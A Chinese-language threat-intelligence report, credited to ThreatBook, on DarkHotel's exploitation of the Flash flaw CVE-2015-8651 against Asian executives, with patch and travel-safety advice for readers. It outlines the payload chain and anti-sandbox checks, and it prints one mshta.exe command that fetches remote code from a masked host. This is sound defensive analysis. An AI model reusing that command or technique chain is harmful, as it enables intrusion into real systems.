當你啟程前往伊薩卡，但願你的道路漫長，充滿奇蹟，充滿發現——卡瓦菲斯 希臘
以此紀念2015，即將逝去的中國威脅情報元年。

Author:ThreatBook

0x00 摘要

Adobe於12月28日釋出了一個應急補丁用於修復Flash 播放器的多個安全漏洞。有線索表明其中之一已被用於APT(高階可持續性)攻擊，國外有媒體揣測其攻擊目標為國內某著名IT企業（http://www.theregister.co.uk/2015/12/28/adobe_flash_security_update/），微步線上尚未發現任何證據支援此結論。但溯源分析表明確有境外駭客團伙利用此漏洞針對中國及亞洲企業的高管發起APT攻擊，此團伙即代號為暗駭客棧（DarkHotel） 的APT攻擊組織。現階段尚不確定此攻擊是否有更復雜的背景。微步線上已第一時間向客戶傳送預警。

我們建議企業高管們立即採取以下措施：

1. 立即升級Flash播放器；
2. 不要點選陌生郵件的附件或連結；
3. 連線酒店WIFI請慎重，收發敏感資訊可用行動通訊網路。

0x01 威脅事件分析

在Adobe於12月28日釋出的19個安全漏洞的應急（OOB）補丁中，CVE-2015-8651 被Adobe 標註為已用於APT攻擊。微步線上透過對多宗活躍APT威脅事件的跟蹤及對CVE-2015-8651攻擊的分析，確定了攻擊流及攻擊者身份。

透過對捕獲的可疑SWF檔案進行分析，確認此樣本利用了Adobe Flash整數溢位漏洞 (即此次Adobe修復的CVE-2015-8651漏洞)。受攻擊者訪問此SWF檔案後，漏洞利用成功會跳轉到下面這段shellcode:

其主要功能是下載一個名為update.exe 的檔案到系統的%temp%目錄下， 透過RC4解密並且透過ECHO加可執行檔案的“MZ”頭來構建有效的PE檔案，然後執行。

Update.exe約1.3Mb, 具有完整的檔案屬性，偽裝成SSH金鑰生成工具：

透過逆向分析發現，木馬作者篡改和裁剪了正常的OpenSSL檔案，篡改後的版本只提供一個引數：-genkeypair。無論是否傳遞此引數，木馬檔案都會首先釋放一個公鑰在當前目錄用於干擾判斷，同時進入真正的惡意程式碼部分。此樣本未進行程式碼混淆，但是採用了多種反除錯/反虛擬機器技術及欄位加密，透過檢測各種系統環境來判斷是否有反病毒軟體及沙箱存在，比如：

Update.exe是一個Trojan Downloader， 利用執行mshta.exe 來下載木馬檔案，木馬檔案伺服器位於冰島。形式如下：

C:\Windows\system32\mshta.exe hxxp://****.com/image/read.php…..

0x02 攻擊團伙分析

隨著對此攻擊事件的目標、工具、手法和過程更詳細的分析，我們發現其特點和暗駭客棧（Darkhotel）有著非常驚人的一致。

暗駭客棧（Darkhotel）APT攻擊團伙的蹤跡最早可以追溯到2007年，其從2010年開始更多的利用企業高管在商業旅行中訪問酒店網路的時機，進行APT攻擊來竊取資訊。因此在2014年卡巴斯基釋出針對此團隊的研究報告時，將其命名為“Darkhotel”。此團伙攻擊目標集中在亞太地區開展業務和投資的企業高管（如：CEO、SVP、高管及高階研發人員），攻擊的行業包括大型電子製造和通訊、投資、國防工業、汽車等。

此團隊使用零日漏洞（特別是Flash型別）來進行攻擊，並規避最新的防禦措施，同時也會盜竊合法的數字證照為後門軟體及監聽工具進行簽名。如果有一個目標已經被有效感染，往往就會從作案點刪除他們的工具，進而隱藏自己的活動蹤跡。從其行動特點看，具有極高的技術能力及充沛的資源。

我們對此次事件和暗駭客棧（Darkhotel）的特點進行了對比，認為有充足理由認定其就是始作俑者。

0x03 小結

透過此事件，我們再次認識到在萬物互聯的年代，單純基於漏洞的防禦往往是防不勝防。只要有足夠的價值，駭客就有足夠的投入和機會攻陷目標。我們需要及時的調整防禦思路，平衡安全投入，更多的聚焦威脅，以威脅情報驅動安全體系建設，建立防禦、檢測、響應及預防一套完整的安全自適應過程。